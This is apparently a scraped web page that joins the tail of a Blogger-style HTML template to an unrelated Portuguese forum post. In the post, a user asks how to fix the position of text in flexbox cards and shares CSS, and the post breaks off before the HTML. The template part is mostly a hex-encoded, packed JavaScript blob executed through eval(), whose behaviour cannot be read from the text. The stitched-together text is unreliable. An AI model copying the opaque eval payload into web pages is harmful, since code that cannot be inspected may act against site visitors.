\x7D\x29\x7D\x29\x3B\x41\x28\x31\x39\x28\x5C\x27\x5C\x5C\x7A\x5C\x5C\x35\x5C\x5C\x62\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x38\x5C\x5C\x33\x5C\x5C\x72\x5C\x5C\x7A\x5C\x5C\x35\x5C\x27\x2B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x61\x5C\x5C\x73\x5C\x5C\x6D\x5C\x27\x29\x2B\x5C\x27\x5C\x5C\x33\x5C\x27\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x71\x5C\x5C\x63\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x6D\x5C\x27\x29\x29\x29\x7B\x31\x39\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x61\x5C\x5C\x73\x5C\x5C\x71\x5C\x27\x29\x2B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x61\x5C\x5C\x73\x5C\x5C\x6D\x5C\x27\x29\x2B\x5C\x27\x5C\x5C\x33\x5C\x5C\x7A\x5C\x5C\x34\x5C\x5C\x63\x5C\x5C\x35\x5C\x5C\x39\x5C\x5C\x4A\x5C\x5C\x33\x5C\x27\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x71\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x79\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x63\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x42\x5C\x27\x29\x2B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x78\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x71\x5C\x27\x29\x5D\x28\x29\x7D\x31\x39\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x61\x5C\x5C\x73\x5C\x5C\x71\x5C\x27\x29\x2B\x5C\x27\x5C\x5C\x62\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x38\x5C\x5C\x33\x5C\x5C\x6B\x5C\x5C\x35\x5C\x5C\x39\x5C\x5C\x35\x5C\x5C\x38\x5C\x27\x2B\x5C\x27\x5C\x5C\x33\x5C\x27\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x79\x5C\x5C\x37\x5C\x27\x29\x5D\x28\x4C\x28\x29\x7B\x41\x28\x31\x39\x28\x48\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x71\x5C\x5C\x63\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x6D\x5C\x27\x29\x29\x29\x7B\x31\x39\x28\x48\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x65\x5C\x27\x29\x2B\x5C\x27\x5C\x5C\x36\x5C\x27\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x6D\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x71\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x79\x5C\x27\x29\x29\x5B\x5C\x27\x5C\x5C\x6A\x5C\x5C\x39\x5C\x5C\x64\x5C\x5C\x37\x5C\x27\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x42\x5C\x27\x29\x2B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x78\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x34\x5C\x27\x29\x5D\x28\x31\x4B\x29\x7D\x49\x7B\x31\x39\x28\x48\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x79\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x6D\x5C\x27\x29\x29\x5B\x5C\x27\x5C\x5C\x63\x5C\x5C\x38\x5C\x5C\x62\x5C\x5C\x36\x5C\x5C\x33\x5C\x5C\x36\x5C\x5C\x35\x5C\x27\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x79\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x63\x5C\x27\x29\x5D\x28\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x42\x5C\x27\x29\x2B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x37\x5C\x5C\x78\x5C\x27\x29\x29\x5B\x32\x28\x5C\x27\x5C\x5C\x30\x5C\x5C\x31\x5C\x5C\x61\x5C\x5C\x30\x5C\x5C\x78\x5C\x27\x29\x5D\x28\x31\x4B\x29\x7D\x7D\x29\x3B\x27\x2C\x36\x32\x2C\x34\x72\x2C\x27\x34\x73\x7C\x34\x74\x7C\x34\x75\x7C\x34\x76\x7C\x34\x77\x7C\x34\x78\x7C\x34\x79\x7C\x34\x7A\x7C\x34\x41\x7C\x34\x42\x7C\x34\x43\x7C\x34\x44\x7C\x34\x45\x7C\x34\x46\x7C\x34\x47\x7C\x34\x48\x7C\x34\x49\x7C\x34\x4A\x7C\x7C\x34\x4B\x7C\x34\x4C\x7C\x34\x4D\x7C\x34\x4E\x7C\x34\x4F\x7C\x34\x50\x7C\x7C\x34\x51\x7C\x34\x52\x7C\x34\x53\x7C\x34\x54\x7C\x7C\x34\x55\x7C\x34\x56\x7C\x34\x57\x7C\x34\x58\x7C\x34\x59\x7C\x34\x68\x7C\x34\x5A\x7C\x35\x30\x7C\x35\x31\x7C\x35\x32\x7C\x35\x33\x7C\x35\x34\x7C\x35\x35\x7C\x35\x36\x7C\x35\x37\x7C\x35\x38\x7C\x34\x66\x7C\x35\x39\x7C\x35\x61\x7C\x35\x62\x7C\x35\x63\x7C\x35\x64\x7C\x35\x65\x7C\x35\x66\x7C\x35\x67\x7C\x35\x68\x7C\x35\x69\x7C\x35\x6A\x7C\x34\x67\x7C\x35\x6B\x7C\x35\x6C\x7C\x35\x6D\x7C\x35\x6E\x7C\x35\x6F\x7C\x35\x70\x7C\x35\x71\x7C\x35\x72\x7C\x35\x73\x7C\x35\x74\x7C\x35\x75\x7C\x35\x76\x7C\x35\x77\x7C\x35\x78\x7C\x35\x79\x7C\x35\x7A\x7C\x35\x41\x7C\x35\x42\x7C\x35\x43\x7C\x35\x44\x7C\x35\x45\x7C\x35\x46\x7C\x35\x47\x7C\x35\x48\x7C\x35\x49\x7C\x35\x4A\x7C\x35\x4B\x7C\x35\x4C\x7C\x35\x4D\x7C\x35\x4E\x7C\x35\x4F\x7C\x35\x50\x7C\x35\x51\x7C\x35\x52\x7C\x35\x53\x7C\x35\x54\x7C\x35\x55\x7C\x35\x56\x7C\x35\x57\x7C\x35\x58\x7C\x35\x59\x7C\x35\x5A\x7C\x36\x30\x7C\x36\x31\x7C\x36\x33\x7C\x36\x34\x7C\x36\x35\x7C\x36\x36\x7C\x36\x37\x7C\x36\x38\x7C\x36\x39\x7C\x36\x61\x7C\x36\x62\x7C\x36\x63\x7C\x36\x64\x7C\x36\x65\x7C\x36\x66\x7C\x36\x67\x7C\x36\x68\x7C\x36\x69\x7C\x36\x6A\x7C\x36\x6B\x7C\x36\x6C\x7C\x36\x6D\x7C\x36\x6E\x7C\x36\x6F\x7C\x36\x70\x7C\x36\x71\x7C\x36\x72\x7C\x36\x73\x7C\x36\x74\x7C\x36\x75\x7C\x36\x76\x7C\x36\x77\x7C\x36\x78\x7C\x36\x79\x7C\x36\x7A\x7C\x36\x41\x7C\x36\x42\x7C\x36\x43\x7C\x36\x44\x7C\x36\x45\x7C\x36\x46\x7C\x36\x47\x7C\x36\x48\x7C\x36\x49\x7C\x36\x4A\x7C\x36\x4B\x7C\x36\x4C\x7C\x36\x4D\x7C\x36\x4E\x7C\x36\x4F\x7C\x36\x50\x7C\x36\x51\x7C\x36\x52\x7C\x36\x53\x7C\x36\x54\x7C\x36\x55\x7C\x36\x56\x7C\x36\x57\x7C\x36\x58\x7C\x36\x59\x7C\x36\x5A\x7C\x37\x30\x7C\x37\x31\x7C\x37\x32\x7C\x37\x33\x7C\x37\x34\x7C\x37\x35\x7C\x37\x36\x7C\x37\x37\x7C\x37\x38\x7C\x37\x39\x7C\x37\x61\x7C\x37\x62\x7C\x37\x63\x7C\x37\x64\x7C\x37\x65\x7C\x37\x66\x7C\x37\x67\x7C\x37\x68\x7C\x37\x69\x7C\x37\x6A\x7C\x37\x6B\x7C\x37\x6C\x7C\x37\x6D\x7C\x37\x6E\x7C\x37\x6F\x7C\x37\x70\x7C\x37\x71\x7C\x37\x72\x7C\x37\x73\x7C\x37\x74\x7C\x37\x75\x7C\x37\x76\x7C\x37\x77\x7C\x37\x78\x7C\x37\x79\x7C\x37\x7A\x7C\x37\x41\x7C\x37\x42\x7C\x37\x43\x7C\x37\x44\x7C\x37\x45\x7C\x37\x46\x7C\x37\x47\x7C\x37\x48\x7C\x37\x49\x7C\x37\x4A\x7C\x37\x4B\x7C\x37\x4C\x7C\x37\x4D\x7C\x37\x4E\x7C\x37\x4F\x7C\x34\x69\x7C\x37\x50\x7C\x37\x51\x7C\x37\x52\x7C\x37\x53\x7C\x37\x54\x7C\x37\x55\x7C\x37\x56\x7C\x37\x57\x7C\x37\x58\x7C\x37\x59\x7C\x37\x5A\x7C\x38\x30\x7C\x38\x31\x7C\x38\x32\x7C\x38\x33\x7C\x38\x34\x7C\x38\x35\x7C\x38\x36\x7C\x38\x37\x7C\x38\x38\x7C\x38\x39\x7C\x38\x61\x7C\x38\x62\x7C\x38\x63\x7C\x38\x64\x7C\x38\x65\x7C\x34\x6D\x7C\x38\x66\x7C\x38\x67\x7C\x38\x68\x7C\x38\x69\x7C\x38\x6A\x7C\x38\x6B\x7C\x38\x6C\x7C\x38\x6D\x7C\x38\x6E\x7C\x38\x6F\x7C\x38\x70\x7C\x38\x71\x7C\x38\x72\x7C\x38\x73\x7C\x38\x74\x7C\x38\x75\x7C\x38\x76\x7C\x38\x77\x7C\x38\x78\x7C\x38\x79\x7C\x38\x7A\x27\x2E\x38\x41\x28\x27\x7C\x27\x29\x2C\x30\x2C\x7B\x7D\x29\x29","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x69\x66\x7C\x70\x61\x72\x73\x65\x49\x6E\x74\x7C\x53\x74\x72\x69\x6E\x67\x7C\x72\x65\x70\x6C\x61\x63\x65\x7C\x77\x68\x69\x6C\x65\x7C\x6E\x65\x77\x7C\x65\x76\x61\x6C\x7C\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x52\x65\x67\x45\x78\x70\x7C\x32\x36\x33\x7C\x78\x33\x30\x7C\x78\x37\x38\x7C\x5F\x30\x78\x31\x34\x37\x36\x7C\x78\x36\x35\x7C\x78\x36\x31\x7C\x78\x37\x34\x7C\x78\x37\x33\x7C\x78\x36\x34\x7C\x78\x36\x63\x7C\x78\x36\x39\x7C\x78\x33\x31\x7C\x78\x36\x66\x7C\x78\x36\x33\x7C\x78\x36\x65\x7C\x78\x36\x32\x7C\x78\x37\x32\x7C\x78\x36\x64\x7C\x78\x33\x32\x7C\x78\x36\x36\x7C\x78\x32\x64\x7C\x78\x37\x30\x7C\x78\x33\x35\x7C\x78\x36\x37\x7C\x78\x33\x34\x7C\x78\x33\x36\x7C\x78\x32\x30\x7C\x78\x33\x33\x7C\x78\x37\x35\x7C\x78\x36\x38\x7C\x78\x32\x66\x7C\x78\x33\x39\x7C\x78\x33\x37\x7C\x78\x32\x65\x7C\x78\x33\x38\x7C\x78\x32\x32\x7C\x78\x33\x65\x7C\x76\x61\x72\x7C\x78\x33\x63\x7C\x78\x37\x39\x7C\x74\x68\x69\x73\x7C\x65\x6C\x73\x65\x7C\x78\x37\x36\x7C\x78\x37\x37\x7C\x78\x33\x64\x7C\x78\x33\x61\x7C\x30\x78\x30\x7C\x78\x36\x62\x7C\x78\x34\x33\x7C\x78\x34\x31\x7C\x78\x35\x34\x7C\x78\x34\x63\x7C\x78\x34\x35\x7C\x78\x35\x39\x7C\x78\x32\x33\x7C\x78\x34\x39\x7C\x78\x35\x66\x7C\x78\x36\x61\x7C\x78\x37\x64\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x78\x34\x36\x7C\x78\x37\x31\x7C\x5F\x30\x78\x33\x31\x66\x62\x32\x32\x7C\x78\x34\x34\x7C\x78\x37\x61\x7C\x30\x78\x31\x7C\x6A\x51\x75\x65\x72\x79\x7C\x78\x32\x31\x7C\x5F\x30\x78\x34\x34\x31\x31\x38\x33\x7C\x78\x35\x37\x7C\x30\x78\x61\x61\x7C\x78\x33\x62\x7C\x78\x34\x66\x7C\x78\x34\x62\x7C\x78\x35\x35\x7C\x78\x37\x62\x7C\x5F\x30\x78\x32\x38\x61\x34\x64\x38\x7C\x5F\x30\x78\x31\x66\x39\x63\x37\x64\x7C\x78\x34\x32\x7C\x78\x34\x65\x7C\x78\x35\x30\x7C\x78\x32\x34\x7C\x78\x32\x63\x7C\x77\x69\x6E\x64\x6F\x77\x7C\x5F\x30\x78\x36\x32\x33\x32\x64\x30\x7C\x5F\x30\x78\x34\x34\x32\x61\x37\x31\x7C\x5F\x30\x78\x31\x63\x36\x63\x38\x30\x7C\x5F\x30\x78\x34\x35\x62\x34\x39\x65\x7C\x5F\x30\x78\x31\x61\x61\x62\x34\x66\x7C\x5F\x30\x78\x35\x62\x63\x33\x66\x63\x7C\x5F\x30\x78\x35\x64\x39\x39\x31\x34\x7C\x5F\x30\x78\x35\x62\x30\x65\x38\x61\x7C\x78\x34\x61\x7C\x78\x35\x32\x7C\x78\x32\x62\x7C\x78\x34\x38\x7C\x78\x32\x36\x7C\x5F\x30\x78\x33\x37\x61\x64\x61\x64\x7C\x5F\x30\x78\x32\x63\x61\x66\x65\x65\x7C\x7C\x5F\x30\x78\x34\x66\x38\x35\x30\x34\x7C\x5F\x30\x78\x31\x35\x35\x63\x64\x61\x7C\x5F\x30\x78\x35\x65\x36\x61\x62\x32\x7C\x5F\x30\x78\x31\x63\x35\x65\x39\x61\x7C\x30\x78\x63\x38\x7C\x5F\x30\x78\x31\x65\x62\x62\x61\x64\x7C\x5F\x30\x78\x33\x61\x37\x31\x38\x37\x7C\x5F\x30\x78\x37\x37\x37\x66\x30\x30\x7C\x5F\x30\x78\x31\x64\x63\x64\x38\x32\x7C\x5F\x30\x78\x32\x32\x36\x31\x66\x32\x7C\x78\x35\x65\x7C\x78\x35\x36\x7C\x78\x32\x35\x7C\x5F\x30\x78\x34\x39\x37\x66\x63\x31\x7C\x5F\x30\x78\x33\x33\x36\x66\x30\x30\x7C\x74\x79\x70\x65\x6F\x66\x7C\x66\x6F\x72\x7C\x5F\x30\x78\x32\x34\x61\x61\x63\x36\x7C\x5F\x30\x78\x33\x36\x30\x64\x62\x31\x7C\x5F\x30\x78\x31\x31\x32\x31\x31\x36\x7C\x5F\x30\x78\x37\x66\x61\x34\x36\x39\x7C\x5F\x30\x78\x31\x61\x31\x36\x65\x66\x7C\x5F\x30\x78\x35\x65\x37\x66\x36\x38\x7C\x5F\x30\x78\x35\x36\x38\x65\x64\x61\x7C\x5F\x30\x78\x34\x33\x35\x62\x39\x33\x7C\x5F\x30\x78\x31\x61\x35\x61\x30\x35\x7C\x5F\x30\x78\x33\x39\x30\x62\x65\x61\x7C\x30\x78\x61\x7C\x5F\x30\x78\x31\x36\x39\x38\x32\x36\x7C\x5F\x30\x78\x35\x39\x35\x38\x33\x7C\x5F\x30\x78\x33\x66\x35\x66\x37\x35\x7C\x5F\x30\x78\x33\x64\x39\x64\x33\x61\x7C\x5F\x30\x78\x31\x30\x33\x37\x61\x34\x7C\x5F\x30\x78\x34\x62\x61\x39\x37\x38\x7C\x78\x35\x62\x7C\x78\x35\x64\x7C\x78\x35\x31\x7C\x78\x34\x64\x7C\x78\x35\x33\x7C\x78\x34\x37\x7C\x78\x33\x66\x7C\x5F\x30\x78\x33\x37\x31\x38\x65\x35\x7C\x5F\x30\x78\x34\x30\x31\x37\x64\x64\x7C\x64\x69\x73\x71\x75\x73\x53\x68\x6F\x72\x74\x6E\x61\x6D\x65\x7C\x5F\x30\x78\x32\x37\x36\x33\x36\x66\x7C\x5F\x30\x78\x33\x63\x64\x38\x36\x65\x7C\x5F\x30\x78\x32\x34\x38\x62\x32\x63\x7C\x5F\x30\x78\x34\x35\x36\x30\x33\x62\x7C\x73\x31\x7C\x5F\x30\x78\x31\x35\x33\x35\x36\x66\x7C\x5F\x30\x78\x31\x61\x62\x37\x37\x62\x7C\x5F\x30\x78\x33\x66\x65\x34\x38\x30\x7C\x5F\x30\x78\x35\x34\x34\x32\x38\x32\x7C\x5F\x30\x78\x32\x62\x64\x34\x64\x65\x7C\x5F\x30\x78\x32\x37\x36\x61\x30\x66\x7C\x5F\x30\x78\x34\x65\x35\x35\x32\x34\x7C\x5F\x30\x78\x62\x64\x63\x37\x34\x35\x7C\x5F\x30\x78\x34\x66\x37\x36\x65\x37\x7C\x5F\x30\x78\x33\x37\x62\x39\x35\x65\x7C\x5F\x30\x78\x31\x64\x34\x65\x61\x30\x7C\x5F\x30\x78\x34\x65\x65\x62\x65\x36\x7C\x5F\x30\x78\x34\x39\x37\x66\x7C\x78\x32\x38\x7C\x78\x32\x39\x7C\x78\x35\x61\x7C\x5F\x30\x78\x32\x61\x36\x31\x32\x65\x7C\x5F\x30\x78\x34\x39\x38\x65\x39\x61\x7C\x5F\x30\x78\x33\x64\x34\x39\x66\x33\x7C\x5F\x30\x78\x65\x30\x38\x31\x64\x38\x7C\x5F\x30\x78\x33\x39\x66\x63\x33\x33\x7C\x5F\x30\x78\x35\x38\x66\x38\x33\x37\x7C\x67\x6C\x6F\x62\x61\x6C\x7C\x5F\x30\x78\x34\x66\x39\x37\x39\x37\x7C\x5F\x30\x78\x32\x63\x37\x39\x36\x61\x7C\x5F\x30\x78\x34\x65\x37\x32\x65\x30\x7C\x5F\x30\x78\x31\x35\x36\x36\x34\x30\x7C\x5F\x30\x78\x32\x66\x33\x31\x34\x38\x7C\x5F\x30\x78\x33\x34\x62\x66\x63\x30\x7C\x5F\x30\x78\x35\x30\x63\x35\x31\x35\x7C\x5F\x30\x78\x35\x38\x65\x64\x37\x30\x7C\x6E\x6F\x54\x68\x75\x6D\x62\x6E\x61\x69\x6C\x7C\x73\x43\x6C\x61\x73\x73\x7C\x30\x78\x66\x61\x7C\x30\x78\x31\x66\x34\x7C\x5F\x30\x78\x33\x35\x31\x65\x36\x37\x7C\x30\x78\x33\x7C\x5F\x30\x78\x32\x33\x36\x38\x36\x35\x7C\x5F\x30\x78\x34\x31\x62\x31\x36\x36\x7C\x5F\x30\x78\x33\x63\x31\x30\x63\x61\x7C\x5F\x30\x78\x35\x38\x36\x39\x62\x66\x7C\x5F\x30\x78\x31\x39\x37\x34\x31\x66\x7C\x5F\x30\x78\x35\x34\x63\x31\x64\x62\x7C\x5F\x30\x78\x34\x38\x61\x38\x36\x64\x7C\x5F\x30\x78\x35\x31\x37\x33\x37\x36\x7C\x5F\x30\x78\x33\x30\x35\x36\x31\x37\x7C\x5F\x30\x78\x33\x66\x32\x35\x61\x39\x7C\x5F\x30\x78\x63\x62\x64\x35\x32\x63\x7C\x5F\x30\x78\x33\x39\x63\x66\x64\x30\x7C\x5F\x30\x78\x33\x62\x33\x65\x35\x37\x7C\x5F\x30\x78\x33\x61\x36\x38\x32\x63\x7C\x5F\x30\x78\x66\x66\x37\x39\x31\x32\x7C\x5F\x30\x78\x34\x62\x33\x63\x33\x66\x7C\x30\x78\x34\x7C\x5F\x30\x78\x35\x66\x34\x35\x32\x62\x7C\x30\x78\x35\x7C\x30\x78\x37\x7C\x5F\x30\x78\x66\x31\x66\x62\x34\x63\x7C\x30\x78\x38\x7C\x5F\x30\x78\x64\x35\x39\x39\x66\x35\x7C\x6D\x6F\x6E\x74\x68\x46\x6F\x72\x6D\x61\x74\x7C\x5F\x30\x78\x31\x32\x36\x36\x36\x30\x7C\x5F\x30\x78\x31\x64\x61\x36\x66\x34\x7C\x5F\x30\x78\x32\x32\x65\x63\x32\x35\x7C\x5F\x30\x78\x33\x66\x35\x32\x37\x30\x7C\x5F\x30\x78\x63\x32\x61\x34\x34\x62\x7C\x5F\x30\x78\x32\x36\x65\x38\x36\x31\x7C\x5F\x30\x78\x34\x39\x37\x32\x35\x64\x7C\x5F\x30\x78\x31\x39\x66\x33\x65\x35\x7C\x5F\x30\x78\x34\x35\x37\x63\x31\x37\x7C\x5F\x30\x78\x34\x34\x36\x39\x62\x33\x7C\x5F\x30\x78\x34\x36\x32\x30\x61\x34\x7C\x5F\x30\x78\x35\x32\x66\x66\x32\x36\x7C\x5F\x30\x78\x31\x31\x32\x30\x30\x34\x7C\x5F\x30\x78\x33\x37\x31\x63\x63\x33\x7C\x5F\x30\x78\x33\x63\x31\x65\x33\x31\x7C\x4D\x61\x74\x68\x7C\x5F\x30\x78\x35\x61\x63\x37\x34\x62\x7C\x5F\x30\x78\x31\x36\x38\x65\x33\x35\x7C\x5F\x30\x78\x32\x31\x65\x30\x64\x32\x7C\x5F\x30\x78\x34\x38\x63\x63\x33\x37\x7C\x78\x35\x38\x7C\x5F\x30\x78\x31\x34\x37\x36\x62\x38\x7C\x61\x72\x67\x75\x6D\x65\x6E\x74\x73\x7C\x6E\x75\x6C\x6C\x7C\x70\x72\x6F\x63\x65\x73\x73\x7C\x72\x65\x71\x75\x69\x72\x65\x7C\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C\x7C\x30\x78\x62\x62\x38\x7C\x6B\x6F\x64\x65\x7C\x5F\x30\x78\x31\x64\x39\x37\x62\x35\x7C\x66\x65\x65\x64\x7C\x5F\x30\x78\x31\x33\x31\x38\x61\x30\x7C\x70\x6F\x73\x74\x50\x65\x72\x50\x61\x67\x65\x7C\x5F\x30\x78\x36\x39\x39\x37\x33\x32\x7C\x64\x69\x73\x71\x75\x73\x7C\x30\x78\x36\x34\x7C\x62\x72\x65\x61\x6B\x7C\x69\x6E\x7C\x69\x54\x6D\x73\x7C\x69\x33\x7C\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x73\x72\x63\x7C\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x53\x79\x73\x74\x65\x6D\x7C\x5F\x30\x78\x32\x32\x38\x63\x39\x38\x7C\x64\x69\x73\x71\x75\x73\x5F\x62\x6C\x6F\x67\x67\x65\x72\x5F\x63\x75\x72\x72\x65\x6E\x74\x5F\x75\x72\x6C\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x73\x70\x6C\x69\x74","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(_0xc689x1,_0xc689x2,_0xc689x3,_0xc689x4,_0xc689x5,_0xc689x6){_0xc689x5= function(_0xc689x3){return (_0xc689x3< _0xc689x2?_0xa4fb[4]:_0xc689x5(parseInt(_0xc689x3/ _0xc689x2)))+ ((_0xc689x3= _0xc689x3% _0xc689x2)> 35?String[_0xa4fb[5]](_0xc689x3+ 29):_0xc689x3.toString(36))};if(!_0xa4fb[4][_0xa4fb[6]](/^/,String)){while(_0xc689x3--){_0xc689x6[_0xc689x5(_0xc689x3)]= _0xc689x4[_0xc689x3]|| _0xc689x5(_0xc689x3)};_0xc689x4= [function(_0xc689x5){return _0xc689x6[_0xc689x5]}];_0xc689x5= function(){return _0xa4fb[7]};_0xc689x3= 1};while(_0xc689x3--){if(_0xc689x4[_0xc689x3]){_0xc689x1= _0xc689x1[_0xa4fb[6]]( new RegExp(_0xa4fb[8]+ _0xc689x5(_0xc689x3)+ _0xa4fb[8],_0xa4fb[9]),_0xc689x4[_0xc689x3])}};return _0xc689x1}(_0xa4fb[0],62,533,_0xa4fb[3][_0xa4fb[2]](_0xa4fb[1]),0,{}))
//]]>
</script>
<!-- Facebook SDK -->
<script type='text/javascript'>
//<![CDATA[
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v3.0';
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
//]]>
</script>
<!-- Overlay and Back To Top -->
<div class='overlay'/>
<div class='back-top' title='Back to Top'/>
<script type='text/javascript'>
/*<![CDATA[*/
// Preloader
$(window).bind("load", function () {
jQuery("#stringPreloader").fadeOut();
jQuery("#loader").fadeOut();
});
/*]]>*/
</script>
</body>
</html>
-
By lezão
Boa Tarde, pessoal!
Td bem com vcs?
Olha eu ai novamente!
Pesquisei e fucei e nada, não consegui nada, não de ficar enchendo o saco de vcs, mas qnd a corda aperta, corro aqui para um help.
Estou com um código que roda perfeitamente, mas qnd eu preciso de um posicionamento, naun vai.
vejam na imagem abaixo para entender?
Vejam que o valor e os outros item abaixo dele, dependendo da quantidade de texto ele fica em um ponto.
Gostaria que ele ficasse, com muito ou pouco texto na posição da 3ª imagem.
Será possivel isso ?
meu codigo CSS:
.banner img { max-width: 100% !important; height: 200px; } .container-cards { flex-wrap: wrap; display: inline-flex; width: 400px; align-items: center; justify-content: center; } .box-container { /*border: 1px solid red;*/ display: flex; background: #fcfcfc; font:80%/1 Arial; font-size: 14px; border-radius: 5px; align-items: center; width: 100%; height: 80px; border: 0px solid #AAAAAA; margin: 5px; background-color: #fcfcfc; -webkit-box-shadow: 1px 3px 5px rgba(250, 242, 242, 0.77); -moz-box-shadow: 1px 3px 5px rgba(250, 242, 242, 0.77); box-shadow: 1px 3px 5px rgba(250, 242, 242, 0.77); } .box-image { width: 20%; align-items: center; display: flex; height: 100%; justify-content: left; border-right: 0px solid #AAAAAA; } .box-container .box-image img { width: 75px; height: 75px; } .box-container .box-content { align-items: left; display: flex; height: 75%; justify-content: left; flex-direction: column; padding: 10px; } .title { margin-bottom: 10px; font-size: 16px font-weight: bold; color: #000; } .description { font:80%/1 Arial; font-size: 14px; color: #8a8686; top: 50px; left: 50px; } Codigo HTML:
